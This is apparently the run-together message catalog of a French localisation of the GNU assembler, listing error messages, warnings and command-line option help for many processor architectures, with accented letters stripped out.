Nombre plus grand que 64 bitsOprande immdiate OPF est hors limite (0-0x1ff)Registre numrot impair utilis comme cible d'une instruction  multiples resgistresDcalage sur des structures imbriqus est ignorDcalage hors limite en 16 bits: %ldDcalage hors limite en 5 bits pour movw/movb: %ld.Une de ces instructions ne peut pas tre excute en parallleUn seul pseudo oprateur .copyright par fichier!Un seul pseudo oprateur .version par fichier!Seulement une comparaison conditionnelle est permiseSeulement un dbordement conditionnel est permisSeul le premier chemin o le conflit est rencontr est rapportopcode  %s  n'est pas reconnu.Opcode  %s  avec ces type d'oprandes ne sont pas disponibles en mode %sopcode  %s  avec ces types d'oprandes ne sont pas disponibles en mode H8/300Opcode  %s  avec ces types d'oprandes ne sont pas disponibles en mode H8/300HOpcode  %s  avec ces types d'oprandes ne sont pas disponibles en mode H8/300Sopcode(%d.%s): Oprande  %s  est hors limite (utiliser 1 ou 2)Oprande  %s  est hors limite (%d <= x <= %d)Oprande  %x  n'est pas reconnue dans fixup16.Oprande  %x  n'est pas reconnue dans le fixup8.Oprande hors limite en 16 bits:  %ld .Oprande hors limite en 8 bits:  %ld .Oprande hors limite pour un branchement relatif:  %ld L'option  %s  n'est pas reconnue.Options:
  -a[sous-option...]	  activer l'affichage
                      	  Sous-options [par dfaut hls]:
                      	  c      omettre les faux conditionels
                      	  d      omettre les directives de dbug
                      	  h      inclure les sources de haut niveau
                      	  l      inclure l'assembleur
                      	  m      inclure l'expansion de macros
                      	  n      omettre le tratiement des formulaires (forms)
                      	  s      inclure les symboles
                      	  =FICHIER  les lister au FICHIER (doit tre la dernire sous-option)
Mmoire puis: ne peut allouer un nouvel espace pour une entre de chane: %s
Mmoire puis: ne peut allouer un nouvel sous-espace pour une entre de chane: %s
PC faisant parti de l'oprande est imprvisiblerelocalisation relative au PC doit tre rsolue de manire trivialeDbordement du dcalage du code PIC (max 16 bits signs)Dbordement du dcalage du code PIC (max 32 bits signs)la taille de relocalisation PIC ne concorde pas avec la taille de l'oprandeOptions PJ:
-little            gnrer du code pour systme  octets de poids faible
-big               gnrer du code pour systme  octets de poids fort
PSW ne peut tre inclu dans la listeoprande PTA est un symbole SHcompactoprande PTB est un symbole SHmdiaParamtres de sous-espaces existants ne peuvent tre modifisInstruction pipeline: fsrc1 = fdestSVP rapporter cette anomalie.
SVP utiliser --help pour connatre les options pour ect assembleur.
Mode post-dcrment n'est pas valide pour 68HC11.Mode post-incrment n'est pas valide pour 68HC11.Mode pr-incrment n'est pas valide pour 68HC11Registre de prdicat attenduPrdicat source et cible requisFin prmature du suffixe -- utilise par dfaut dPseudo-directive .file est valide seulement lors de la gnration ELFPseudo-directive .loc est valide seulement lors de la gnration ELFRedfinition entrynum pour sysproc %sRedfinition leafproc %sRegistre invalide pour H8/300Nom de registre %s est en conflit avec un symbole du mme nomNom de registre attendule numro de registre doit tre PAIRSymbole du registre %s est dj dfini.Annotation de valeur de registre ignoreLa relaxe ne doit jamais se produireValeurs relocalisables requirent au moins un MOT de stockageRelocalisation %d n'est pas supporte par le format du fichier objet.Relocalisation %s n'est pas sre pour %sRelocalisation ne peut tre faite avec -mrelocatableRapporter toutes anomalies  %s
code SHmedia n'est pas permis dans la mme section comme constantes et code SHcompactOptions SPARC:
TABLE DE SYMBOLE non implantS^# doit tre en accs lecture seulementS^# a besoin d'une expressionMode d'adressage index-chelle combin avec un index-chelleERREUR de smantique.  Ce type d'oprande ne peut tre relocalis, ce doit tre
une constante utilise au moment de l'assemblageDbordement de litral  short  (%ld.), mode immdiat assum.Fausse  ,  ou mode erron d'adressage indirect par registre.Symboles de substitution doivent commencer par une lettreSous-type %d n'est pas reconnu.Support pour l'arithmtique  64 bits n'est pas compil.Ordre d'instruction de commutation (swapping)Symbole  %s  n'a pu tre cr.Symbole  %s ne peut tre  la fois weak et common Symbole manquant pour .set/.equsymbole utilis comme oprande immdiate en mode PICERREUR de syntaxe dans le mode index-chelle, utiliser [Rn:m] o  n=[0..7] m={b,w,d,q}TRACE DE JETON non implantLe processeur cible ne supporte pas cette instructionLe pseudo-op .ENTER n'est pas supportLe pseudo-op .LEAVE n'est pas supportLe format de fichier XCOFF ne supporte pas des sections arbitrairesLa directive  .abi %s  n'est pas valide pour cet architectureLa directive  .mode %s  n'est pas valide pour cet architectureL'identificateur de trappe doit tre une constante.Cet assembleur a t configur pour la cible  %s .
Cette immdiate requiert un alignement 0 MOD 16Cette immdiate requiert un alignement 0 MOD 2Cette immdiate requiert un alignement 0 MOD 4Cette immdiate requiert un alignement 0 MOD 8Voici la localisation d'un usage conflictuel.l'oprande doit tre une constante au moment de l'assemblageTrop d'oprandesTrop d'oprandes passes  l'instructionTrop d'oprandes: %sIdentificateur de la trappe  %ld  est hors limite.Identificateur de la trappe doit tre entre [0x30..0x39] ou [0x40..0xff]Essay la directive .set pour un mode non reconnu  %s Tentative d'initialisation d'un symbole non reconnu: %s
Tentative de  bal  vers %sDeux instruction IU ne peuvent pas tre excutes en parallleDeux instructions MU ne peuvent pas tre excutes en parallle.Incapable d'allour de la mmoire pour de nouvelles instructions
Incapable de dterminer le processeur cible par dfaut  partir de la chane: %sIncapable de mlanger les instructions tel que spcifiIncapable de produire une relocalisation vers le symboles  %s L'oprateur unaire %c est ignor en raison d'oprandes errones qui le suiveArgument .EXPORT/.IMPORT non dfini (ignor): %sConstante absolue indfinie:  %s .Registre indfinie:  %s .Espace indfini:  %s  Numro d'espace assum = 0.Symbole de substitution indfini  %s Conversion inattendu de branchement avec  %x Valeur retourne inattendue [%d]  partir de parse_toc_entry!
Dpendance non traite %s pour %s (%s), noter %dRegistre spcifi non implant  %s Modificateur d'expression toc32 non implantModificateur d'expression toc64 non implantOprande inconnue .syntaxidentificateur de CPU inconnu  %s architecture inconnueCPU par dfaut inconnu = %s, systme d'exploitation = %sinstruction inconnue  %s opcode inconnu  %s opcode inconnu:  %s Oprateur inconnuRelocalisation inconnue rencontre  dans md_apply_fix.Oprande de relocalisation inconnue: !%sDirective de section inconnuetype de segment inconnuPseudo registre temporaire inconnuRelocalisation high/shigh non paireOption non reconnue: -hiddenArgument .LEVEL non reconnu
Argument .type non reconnuCode de condition non reconnu  %s Spcificateur de dpendance non reconnu %d
Type de champ non reconnu  %c Forme de correctif non reconnu (0x%08lx)Format non reconnu d'adresse indirecte  %s Instruction non reconnnue  %s format de opcode non reconnu:  %s opcode non reconnu:  %s Liste d'oprandes non reconnue  %s pour l'instruction %s option  %s  non reconnueOption non reconnue '-x%s'option non reconnnue aprs -KInstruction parallle non reconnue  %s Instruction parallle non reconnue  %s Combinaison non reconnue d'instructions parallles  %s || %s Type de relation de prdicat non reconnusection non reconnue  %s Bit d'tat non reconnnu  %s tiquette struct/union non reconnue  %s fonction de substitution de symbole non reconnuesuffixe de symbole non reconnuJeton non reconnu  %s Version non reconnue  %s Constante de grande taille non supporteTaille de relocalisation non supporte %dAttribut de section non support --  a Utilisation non supporte de .gpwordUtilisation non support de .gpwordUtilisation non support de spChane non termine aprs l'expression absoluedirective unwind n'est pas suivie d'une instruction.Usage: %s [option...] [fichier-assembleur...]
Utilisation de .def/.ref est dprci.  Utiliser .global  la placeUtilisation de p n'est pas valide dans ce contexteUtiliser la directive .mmregs pour des noms de registres mappant la mmoire tel que  %s Utilisation de $at sans ".set noat"Utilise ENTRY plutt que CODE dans la directive d'exportation pour %sOptions VAX:
-d LONGUEUR               ignor
-J                        ignor
-S                        ignor
-t FICHIER                ignor
-T                        ignor
-V                        ignor
registre VFP en simple prcision attenduregistre systme VFP attenduERREUR VIP_BEGIN:%sVLIW violation de la contrainte d'empaquetageVLIW empaquetage utilis pour -mno-pack-+                      encoder par hachage (sans tronquer) les noms plus longs que 64 caractres
-H                      afficher les nouveaux symboles aprs une troncation du hachage
Options VMS:
-+                        hash encoder les noms plus longs que 31 caractres
-1                        traiter les  const  en mode compatible avec gcc 1.x
-H                        afficher les nouveaux symboles aprs la troncation hash
-h NUM                    ne pas hacher les noms avec des casses mlanges
                          et ajuster la casse:
                          0 = majuscule, 2 = minuscule, 3 = prserver la casse
-v VERSION                inscrire le numro de VERSION du code assembl
Valeur %ld trop grande pour un branchement de 8 bits relatif au PCValeur de ENTRY_FR doit tre dans la plage 12..21
Valeur de ENTRY_GR doit tre dans la plage 3..18
Valeur de ENTRY_SR doit tre 3
Valeur n'est pas dans les bornes de 16 bits: %ldValeur n'est pas dans les bornes de 4 bits: %ldValeur n'est pas dans les bornes de 5 bits: %ldValeur n'est pas dans les bornes de 6 bits: %ldValeur n'est pas dans les bornes non signes de 6 bits: %ldValeur n'est pas dans les bornes de 8 bits: %ldValeur de 16 bits hors limite.Valeur tronque  62 bitsOption applique  une instruction trs courte, i.e. vous ne pouvez le faire sur une chane NULLMmoire virtuelle puiseAVERTISSEMENT:AVERTISSEMENT:AVERTISSEMENT: duplication de registre (r%d) dans la liste des registresAVERTISSEMENT: gamme de registres n'est pas en ordre ascendantdplacement erron %dNombre erron d'oprandesNombre erron d'oprandes dans le dfaut, vrifier ns32k-opcodes.hMauvais registre dans la liste des registres en virgule flottanteMauvais registre en mode registre indirect.Taille errone du registre de pointeur pour l'architecturetiquettes [0-9]H ne peuvent tre mlanger avec des dot-pseudostiquettes [0-9]H ne peuvent apparatre seuls sur une ligneindexation du [PC] est bannie[]index identique  ()+registre: imprvisible[]index identique  -()registre: imprvisiblesymbole [tocv] n'est pas un symbole toc %s est dj l'alias de %s `%s' %s  n'est pas une expression de base/index valide de %s bits %s  n'est pas une expression de base/index valide %s  n'est pas un registre de segment valide %s oprande %d doit utiliser le segment %%es  %s  symbole sans fonction qui la prcdeoprateur de numro de srie  &  n'est pas support )  requis ,  requis .abi 32  mais les options fournies ne spcifient pas un ABI 64 bits .abi 64  mais les options fournies ne spcifient pas un ABI 64 bits af  doit apparatre seul noreorder doit tre initialis avant nomacro Un grand nombre avec souligns ne peut avoir plus de 8 chiffres hexadcimaux dans n'importe quel mot.Un grand nombre avec souligns doit avoir exactement 4 mots.un registre n'a pas d'adresseexpression absolue requisesections absolues ne sont pas supportesacc0 attendul'adresse interdit #l'adresse interdit ()l'adresse interdit ()+l'adresse interdit -()l'adresse interdit @l'adresse interdit []adresse interdit un spcificateur de longeur de dplacementadresse interdit l'utilisation de registreadresse trop grande pour la table de vecteur jmp/jsrmode d'adressage non supportalias = %s
alignement ngatif: 0 assumalignement ngatif; 0 assumalignment n'est pas une puissance de 2remplissage pour alignement (%lu octets) n<est pas un multiple de %ldalignement trop grand: %d assumalignement trop grand: %u assumalignement trop grand; %d assumalignment trop grand; %d assumalignements plus grand que 32 octets ne sont pas supports dans les sections .textarchitecture bouscul de  %s  %s sur %s conflit de opcode d'architecture avec ceux d'instructions dj dfiniesassembler en code Thumbassembler pour un systme  octets de poids fortassembler pour un systme  octets de poids faibleassumer que tous les membres du groupe  %s  sont COMDATtentative arrire sur les directives .org/.space? (%ld)tentative arrire pour .space/.bes ? (%ld)tentative d'allouer des donnes dans une section absoluetentative d'allouer des donnes dans une section communetentative de branchement dans un segment diffrenttentative pour obtenir la valeur du symbole non rsolu  %s tentative de dplacement de .org vers l'arriretentative de redfinition du pseudo-op  %s  ignoretentative de redfinition de symboletentative de stockage d'une valeur dans une section absoluerfrence arrire vers une tiquette inconnue "%d:"segment .common erron %sdirective .fmask erronedirective .frame erronedirective .mask erroneformat .relax erronsegment .reserve erron -- segement BSS attenduformat .uses erronDirective .weakext erroneinformation de dbug COFF erronemauvais argument pour la directive de syntaxearguments errons pour l'instructionregistre de base erron: doit tre r0index de vecteur octer erron (%ld)appel erron de MD_ATOF()appel erron  md_atofcaractre erron =  %c 
identificateur de co-processeur errondefsym erron; format est --defsym nom=valeurmauvais caractre d'chappement dans la chaneexpression erronelitral de virgule flottante erron: %sconstante errone en virgule flottante: dbordement de l'exposantconstante errone en virgule flottante; code d'erreur inconnu=%dmauvais format pour ifc ou ifncformat erron de OPT NEST=profondeurvaleur immdiate errone pour le dcalage (%ld)instruction  %s  erroneoprande mmoire errone  %s opcode ou oprandes erronsexpression absolue errone ou irrductibleexpression absolue errone ou irrductible; zro assumnumro de co-processeur erron ou manquanttype de relocalisation mauvais ou non trait: 0x%02xhors limite dans la liste de registresmauvais registre dans l'expressionmauvais registre dans []liste de registres erroneliste de registres errone: %smauvais nom de registre  %s mauvais nom de registre: %sNumro de registre erron: %smauvais type de relchetype erron de correctif de relocalisation (%d)type de relocalisation erron: 0x%02xsegment erronregistre de dpart erron: r0 et r15 invalidesmauvais suffixe de symbolespcificateur psr erron/manquantdirective .dim mal composedirective .dim mal compose - ignoredirective .size mal composeregistre de base attenducible-bfd = %s
bfd_set_section_flags: %ssystme  octets de poids fort n'est pas supportgrand nombre invalidegrand nombre invalide; zro assumgrand nombre tronqu  %d octetsles deux insns pour !gpdisp!%ld doivent tre dans la mme sectionbra ou bsr avec symbole dfini.oprande de branchement a un dcalage impair (%lx)
branchement hors gammmeprdiction de branchement invalide pour ce opcode break  en dehors de la boucle structureDplacement d'octet hors limiteoctet ou demi-mot non valide pour un registre de baseappel de md_convert_frag 
appel de md_convert_frag 
appel de md_estimate_size_before_relax 
appel de tc_aout_fix_to_chars 
appel de tomd_estimate_size_before_relax 
call/jmp cible hors limite (1)call/jmp cible hors limite (2)ne peut faire une relocalisation relative au PC de %d octetsne peut relocaliser %d octetsne peut rsoudre l'expressionne peut indexer[] un registre, parce qu'il n'a pas d'adressene peut fermer  %s ne peut cret le groupe: %sne peut crer la section %sne peut tendre la fragmentation de %u caractresne peut reprer le correctif point par .usesne peut reprer le opcodene peut reprer le opcode ne peut traiter l'expressionne peut traiter la gnration de litrals/tiquettes encorene peut traiter un segment non absolu dans  %s ne peut traiter un TYPE OP indfinine peut avoir de relocalisation pour ipushne peut mlanger des arguments positionnels et des mots clsne peut ouvrir  %s  en criturene peut ouvrir un bfd sur stdout %sne peut analyser la liste de registresne peut faire une pr-dcrmentationne peut rsoudre `%s' {section %s} - `%s' {section %s}ne peut rsoudre la valeur du symbole  %s ne peut initialiser les fanions de section por la section %sne peut dbuter l'criture de la section .mdebug: %sne peut utiliser un format COBR avec une tiquette externene peut utiliser R0 icine peut utiliser la partie haute du registre dans l'oprande %dne peut  la fois pr-dcrmenter et post-dcrmenterne peut brancher vers une adresse impairene peut dfinir le symbole  %s  dans la seciton absoluene peut produire une relocalisation %s relative au PCne peut produire une relocalisation %s relative au PC pour %sne peut gnrer un type de relocalisation pour le symbole %s, code %sne peut reprsenter la relocalisation %s dans ce format de fichier objetne peut reprsenter la relocalisation  %s  dans le fichier objetne peut reprsenter le type de relocalisation %sne peut fixer literal_prefix  l'intrieur d'un gragment de litralne peut crire dans le fichier de sortiecanonique = %s
constante de caractres trop grandecaractre suivant le nom n'est pas  # cmpu ne supporte pas le code de condition %sregistre de coprocesseur attenducode est conforme ATPCSle code utilise un compteur de programme de 26 bitsle code utilise un compteur de programme de 32 bitsvirgule manquante dans .xstabscondition n'est pas suivie par insn conditionnableexpressions confuses de relocalisationconfusion dans les paramtres formelsexpression de constante attendueexpression de constante ou liste de registre attendueconstante hors limite pour les bornes de 8 bits: %dconstant trop grande pour tre insre dans l'instructionvaleur constante requiseregistre de contrle attendu, mais a eu '%.6s'convert_frag
ne peut initialiser l'architecture et la machinene peut escamoter jusqu' %ld dans le fichier  %s ne peut mettre  jour l'architecture et la machinene peut crire la section .mdebug: %stype de CPU = %s
cr%ld est un registre de contrle rservrelocalisation ctoff() utilise sur une instruction qui ne la supporte pasitem de donnes avec un alignement plus grand que la localisationdest et source1 doivent tre le mme registredestinationoprande de destination doit tre un registre de 16 bitsoprande de destination doit tre une adresse absolue de 16 bitsoprande de destination doit tre un registre de 8 bitsregistre de destination est le mme pour les insns paralllesregistre de destination doit tre r1utilisation d'un registre global dtecte n'est pas couvert pas un pseudo-op .registerdirective .big rencontre alors que l'option -big est requisedirective .little rencontre alors que l'option -little est requisedirective LOC  partir de la paire BSPEC/ESPEC n'est pas supportedirective LOCAL doit tre plac dans le code ou le datadplacement provoque un dbordement du champ de 12 bitsdplacement provoque un dbordement du champ de 8 bitsdplacement pour dfinir le symbole %s provoque un dbordement du champ de 12 bitsdplacement pour dfinir le symbole %s provoque un dbordement du champ de 8 bitsdplacement pour symbole indfini %s provoque un dbordement du champ de 12 bitsdplacement pour symbole indfini %s provoque un dbordement du champ de 8 bitsdplacement trop grand (%d)dplacement trop grand pour cette architecture; a besoi nde 68020 ou plusdivision par zrodivision par zro lors de l'initialisation de  %s dla utilis pour charger le registre de 32 bitsn'est pas pair avec le dbut %s%s  %s:%dxsla valeur de dcalage dsp immdiate n'est pas une constanteduplicit de !tlsgd!%ldduplicit de !tlsldm!%ldduplicit du  else Duplication d'oprateur d'tiquette de donnes ignorspcificateur de bit psr est duplicat else non pair avec if tiquette de champ vide pour ISnom de symbole vide dans .def; ignormulations non traits dans cette configurationfin du fichier aprs la prsence d'un seul caractre apostrophe; \0 insrfin du fichier dans le commentairefin de fichier dans le commentaire; nouvelle ligne insrefin de fichier dans le caractre d'chappementfin de fichier dans un commentaire multilignesfin de fichier  l'intrieur d'un conditionnelfin du fichier n'est pas  la fin de la ligne; nouvelle ligne insrefin de macro  l'intrieur d'un conditionnel endf sans for  endi non pair avec if dernier registre doit tre r15 endw sans while taille d'entit pour SHF_MERGE non spcifieentre d'nstruction avec dcrmentation de pile < 16erreur de construction %s table pseudo-op: %serreur lors de l'initialisation des fanions de  %s : %serreur lors de l'initialisation des fanions pour  .sbss : %staille estime
estimate_size_before_relax a t appelnumro paire de registre est requisoprandes en excs vers %sexcs d'oprandes:  %s %c attenduattendu .L, .W ou .B pour le registre dans le mode d'adressage index<nn> attendu@ attendu (exp, reg16)registre EP attenduexpression d'adresse attendueparenthses de fermeture attenduevirgule attendue aprs  %s virgule attendue aprs le nom  %s virgule attendue aprs le nom  %s  dans la directive .sizevirgule attendue aprs le nom dans .symverVirgule attendue ou deux points aprs le nom de symbole: reste de la ligne ignor.patron de remplissage manquant et attenduchane en commentaire attendueregistre attendunombre simple attendunom de symbole attenduattendu un mode d'adressage valide pour mova: "@(disp, ea.sz),ERn") attenduattendu  ) aprs le facteur d'chelle dans %s attendu  , ou ) aprs le registre de base dans %s attendu  , ou ) aprs le registre d'index dans %s attendu un registre d'index ou un facteur d'chelle aprs  ,; a obtenu %c mnmonique attendue; n'a rien obtenuoprande attendue aprs  , ; n'a rien obtenuoprande attendue avant  , ; n'a rien obtenuprfixe attendu; n'a rien obtenufacteur d'chelle attendu de 1, 2, 4, ou 8: a obtenu  %s chane d'instruction attendue aprs  %s expr.c(oprande): mauvaise valeur retourn par atof_generic %dexpression n'entre pas dans un OCTETexpression n'entre pas dans un MOTexpression hors limiteexpression hors limite: utilise 0 par dfautexpression hors limite: utilise 1 par dfauterreur de syntaxe dans l'expressionexpression trop complexeinstruction tendue dans la plage de dlaioprande tendue demand mais non requisearguments superflues pour .LABEL sont ignors.a chou pour %d
chec du registre gnral de la vrification de l'tat de santchec du regnum de la vrification de l'tat de santla vrification de l'tat de sant a choula vrification de l'tat de sant a choula vrification de l'tat de sant a chou: long_jumpla vrification de l'tat de sant a chou: short_jumpcas spcial insn a chou la vrification de l'tat de santchec de lecture de la table d'instructions %s
chec d'initialisation des informations de dbug: %s.file factice aprs un vrai fichierchamp fx_size trop petit pour contenir %dtaille du champ doit tre 16 quand la valeur est relocalisablevaleur du champ  %s  trop complexe pour un champ de bitsvaleur du champ tronquelargeur du champ  %s  trop complexe pour un champs de bitslargeur du champ %lu trop grande pour s'insrer dans %d octets: tronqu  %d bitsfichier non trouv: %snumro de fichier %ld est dj alloule numro du fichier est plus petit que unnom de fichier dborde la frontire de une pagepremier registre doit tre R4correctifs n'ont pas tous t dplacs  partir de %sfanion pour instruction {c}psr attenduarguments en virgule flottante sont dans les registres FPconstante en virgule flottante trop grandenombre flottant invalidenombre flottant invalide; zro assumformat = %s
repr %d oprande pour '%s': attendu %drepr trop (%d) d'oprandes pour '%s': attendu %dregistre de trame attendu, utilise $%drabiut aprs la spcification d'index ignorrebut  la fin de la ligneinstruction suivie de rebutsgnrer du code PICget_expanded_loop_offset: opcode invalidenom de groupe pour SHF_GROUP non spcifivoici le  else  du conditionnel non terminvoici le  else  prcdentvoici le  if  prcdentvoici le dbut du conditionnel non terminbits du haut initialiss dans l'expression de la liste des registresi860_convert_frag
i860_estimate_size_before_relax
identificateur+constante@%s signifie identificateur@%s+constanteidentificateur+constante@got signifie identificateur@got+constantesi la registre de r-criture est dans la liste, il doit tre le plus bas dans la listemauvais alignement ignorchangement d'attributs de section ignor pour %schangement d'entit de taille de section pour %son ignore '-rename-section' delimiter ':' supplmentaireignor la valeur de remplissage dans la section absoluetype de section incorrect de %s a t ignor'-rename-section' specification: '%s' est invalide, ignoroprandes ignores: %s a ignor la redfinition de l'alias du registre  %s type de systme  octets non reconnu dans .endian  %s iif conversion interne pcrel/binaryiif conversion interne pcrel/pointeurtaille des %srelocalisations illgale: %ddirective .stab%c illgale, mauvais caractreexpression .stabx illgale; zro assumexpression illgalelitral illgalopcode illgale %s pour MCU %soprande illgaleoprande illgale - nom de registre repr alors qu'aucun n'tait attenduoprande illgaleregistre illgal aprs @registre illgal aprs @-registre illgal inclu dans la liste immediate  1 ou 2 attenduimmediate n'est pas une puissance de deux immediate  doit tre 1 ou 2oprande immdiate illgale avec un saut absoluoprande immdiate est trop grandevaleur immediate est hors limitevaleur immediate est hors limitenombre incorrect d'oprandes. Attendait %d, a obtenu %darguments inappropris pour le opcode  %s register incorrect dans la liste des registresindirect %s sans  * insertion de  %s  dans la table d'alias %s a chou: %sinsertion de  %s  dans la table de noms %s a chou: %sinsertion de  %s  dans la table de hachage des chanes: %sinsertion de  %s  dans la table de symboles a chou: %sinsertion de  %s  dans la table de hachage d'tiquettes: %sinsn ne peut tre combin avec un traitement parallle insninsn ne peut tre combin avec pmulsinstruction %s requiert oprande %dinstruction  %s  ne peut tre excute en parallle.instruction  %s  est valable seulement pour M32RXl'instruction n'est pas conditionnelleinstruction non permise: %sInstruction requiert une tiquetteInstruction requiert une tiquette ou une valeur dans l'tendue -511:512Instruction requiert une tiquette SANS '$'erreur interne, ligne %d, %sconfusion interne: relocalisation dans une section sans contenuerreur interne: opcode mips16 erron: %s %s
erreur interne: ne peut exporter le type de relocalisation %d ( %s )ERREUR interne: ne peut adresser par hachage  %s : %s
erreur interne: ne peut insrer dans la table de hachage la macro  %s : %serreur interne: ne peut insrer dans la table de hachage le opcode  %s : %sERREUR interne: ne peut installer un correctif pour le type de relocalisation %d ( %s )erreur interne: correctif non contenu  l'intrieur du fragerreur interne: oprande lookup/get a chouerreur interne: perte du opcode:  %s %s 
erreur interne: chec de relcheerreur interne: relche requiert trop d'tapeserreur interne: format DWARF2 inconnuerreur interne? ne peut gnrer la relocalisation  %s chec interne dans parse_register_listinconsistence interne dans %s: bdap.w sans symboleinconsistence interne dans %s: bdapq pas de symboleproblme interne d'inconsistance dans %s: fr_subtype %dproblme interne d'inconsistance dans %s: fr_symbol %lxproblme interne d'inconsistance dans %s: symbole rsolurelocalisation interne (type: IMMEDIAT) n'est pas corriginterne: BFD_RELOC_MMIX_BASE_PLUS_OFFSET n'est pas rsolu pour la sectioninterne: expression GREG non rsolue pour la sectioninterne: opcode mips erron (bits 0x%lx indfinis): %s %sinterne: opcode mips erron (erreur de masque): %s %sinterne: opcode mips erron (type d'oprande d'extension inconnu  +%c ): %s %sinterne: opcode mips erron (type d'oprande inconnu  %c ): %s %sERREUR interne: ne peut adresser par hachage  %s : %sinterne: mmix_prefix_name mais le prfixe est videinterne: type inattendue de relaxation %d:%dinterne: tiquette %s non traiterelocalisation interne (type: OFFSET_IMM) n'est pas corrigexpresion BSPEC invalideregistre HI invalide avec une immdiatexpresion LOC invaliderfrence PIC invalideabi invalide -mabi=%sextension d'architecture invalidearchitecture invalide %sarchitecture invalide -A%sarchitecture invalide -xarch=%sarchitecture invalide -z%soption d'architecture invalide -m%s, ignortentative invalide de dclaration d'un nom de version externe comme symbole par dfaut  %s registre de base invalide pour un registre de dcalageoprande de brannchement invalidedcalage d'octets de branchement invalidecaractre invalide %s au dbutde l'oprande %d  %s caractre ivalide %s avant l'oprande %dcaractre invalide %s dans  la mnmoniquecaractre invalide %s dans l'oprande %dcaractre invalide en entrenom du code de condition invalideconstante invalideconstante invalide (%lx) aprs le correctifvaleur de sous slection du co-processeur invalide (0-7)taille de dplacement par dfaut invalide "%s". Utilisera par dfaut %d.boucle vide invalideexpression invalide dans l'valuation du type %dexpression invalide dans chargement/stockage multiplesexpression invalide dans l'oprandeidentificateur invalide pour  .ifdef type immdiat invalideimmdiat invalide pour le calcul d'adresse (valeur = 0x%08lX)immdiat invalide pour un calcul d'adresse de pileregistre d'index invalidetaille d'index invalide pour un  coldfire taille de registre indirect invalideinstruction invalide pour cette architecture; a besoin de taille d'instruction invalide (%d)dernire instruction invalide pour une boucle avec zro-overheadOption de listage invalide  %c litral de constante invalide: le bassin doit tre plus prsfusion invalide d'entit tailleregistre d'adresse movx invalideregistre dsp movx invalideregistre d'adresse movy invalideregistre dsp movy invalidenombre invalidedcalage invalide, valeur trop grande (0x%08lX)opcode invalideopcode invalide,  %s .oprande invalidemode d'oprande invalide pour cette architecture; a besoin de 68020 ou plusoprande invalide ()+oprande invalide -()oprande invalide S^#requte invalide de taille d'oprandessuffixe d'oprande invalideoprande invalide pour la directive .code (%d) (attendu 16 ou 32)oprande invalide pour l'opcode %s:  %s oprande invalide n'est pas une valeur signe de 10 bits: %dvaleur de l'oprande n'est pas une valeur signe de 11 bits: %doprande invalide n'est pas une valeur signe de 12 bits: %doprande invalide n'est pas une valeur signe de 13 bits: %doprande invalide n'est pas une valeur signe de 16 bits: %dvaleur de l'oprande n'est pas une valeur non signe de 5 bits: %dvaleur de l'oprande n'est pas une valeur non signe de 6 bits: %dvaleur de l'oprande n'est pas une valeur non signe de 6 bits: %doprande invalide, doit tre un multiple de 32: %doprande invalide, n'est pas un multiple de 4: %doprande invalide, n'est pas un multiple de 8: %doprande invalide n'est pas une valeur paire: %doprandes invalidesoprandes invalides pour opcodeoprandes invalides vers %soprandes invalides pour l'opcode %s:  %s pseudo opration invalideregistre invalide dans l'expression &liste de registres invalideliste de registres invalide pour les instructions push/popmasque de registre invalidenom de registre invalideregistre invalide: r15 illgalrelche de fragment resultant invaliderelocalisation invalide pour le champrelocalisation invalide pour l'instructionrelocalisation invalide pour l'oprande %d de '%s'facteur d'chelle invalidesection invalide pour une opration sur  %s section invalide pour une opration sur `%s' initialisant  %s sections invalides pour une opration sur `%s' et `%s'sections invalides pour une opration sur `%s' et `%s' initialisant  %s segment invalide  %s expression swi invalideoption invalide -m%ssyntaxe invalide pour le directive .reqnom de registre systme invalidevaleur d'oprande non tendue invalidesaut vers une adresse mal aligne (0x%lx)rebuts  %s  aprs l'expressionrebut  %s  aprs le registrerebut  la fin de la ligne:  %s la utilis pour charger le registre de 64 bitstiquette "$%d" redfinietiquette "%d$" redfinidernier registre doit tre R7oprande de gauche est un grand nombre; entier 0 assumoprande de gauche est un nombre flottant; entier 0 assumlongueur n'est pas requiseligne %d: rep ou repi doit inclure au moins 4 instructionsligne %d: incapable d'insrer l'adresse du symbole  %s  dans un octetligne %d: incapable d'insrer l'adresse du symbole  %s  dans un quadligne %d: incapable d'insrer l'adresse du symbole  %s  dans un shortligne %d: incapable d'insrer la valeur %lx dans un octetligne %d: incapable d'insrer la valeur %lx dans un shortligne %d: type de relocalisation inconnu: 0x%xnumro de ligne (%d) pour la directive .stab%c ne peut s'insrer dans le champ d'index (20 bits)numros de ligne doivent tre positifs; numro de ligne %d rejetinsertion dans le bassin de mots  choudbordement du bassin de motslitral rfrenc  travers une frontire de sectionmode d'adressage lk sont invalides pour un mode d'adressage par registre adressant la mmoireregistre LO requistiquette locale  %s  n'est pas dfinielong saut (jump) requisboucle cible ne rfre pas  une instruction de boucle dans la sectionvaleur trop longue de boucle pour l'instruction LOOP16 bits du bas du masque sont ignorsexpression lui n'est pas dans les bornes 0..65535macro requiert le registre $at alors qu'il n'est pas effectifmacro requiert $at alors que $at est utilismacros imbriques trop profondmentmd_convert_frag
md_estimate_size_before_relax
md_pcrel_from
donne mal alignesdcalage dsalignpas de concordance entre la taille du opcode et celle de l'oprandepas de concordance entre le registre et le suffixe.eb ne concorde pas.procend mal positionnoprande PIC mal positionn %c  manquant ]  manquant.end manquant.end manquant  la fin de l'assemblage.end ou .bend manquant  la fin du fichier.func manquant.proc manquant= manquant] manquant }  manquantalignement manquanteextension d'architecture manquantenom d'architecture manquante  %s sparateur d'argument manquant  ,  pour .cpsetupclasse manquanteapostrophe de fermeture manquant; (assum)virgule manquante aprs la constante insn
code de condition manquant dans la directive de contrle structurearchitecture cpu manquantenom de cpu manquant  %s  do  manquantnom du mode d'mulation manquantexpression manquanteexpression manquante dans la directive .sizetiquette manquanteexpression locale manquanteparamtre du modle manquantnom manquantopcode manquantoprande manquanteoprande manquante; zro assumexpression de dplacement invalide ou manquante  %s  alors 0 assumnom de symbole rel manquantnouveau nom de chane manquantsparateur manquanttaille manquanteexpression de la taille manquantechane manquantenom de symbole manquant then  manquant to ou downto  manquanttype manquantvaleur manquantenom de version manquant dans  %s pour le symbole %s plus de 65K de mots dans le bassinspcifications multiples de conditionmultiples noms d'mulation spcifislitrals multiples dans l'expansionspcifications multiples movxspcifications multiples movyspcifications multiples de traitement paralllemultiples sections remapps  la section de sortie %sversion multiples [ %s|%s] pour le symbole %s doit tre @(r0,...)doit faire un branchement vers une adresse qui est un multiple de 4alignement ngatiftaille ngativevaleur ngative ignore dans %sblocs .bs imbriqusdirective .ent imbriquessaut de ligne dans le titre next  en dehor de la boucle structurepas de  ( pair avec ) pas de  [ 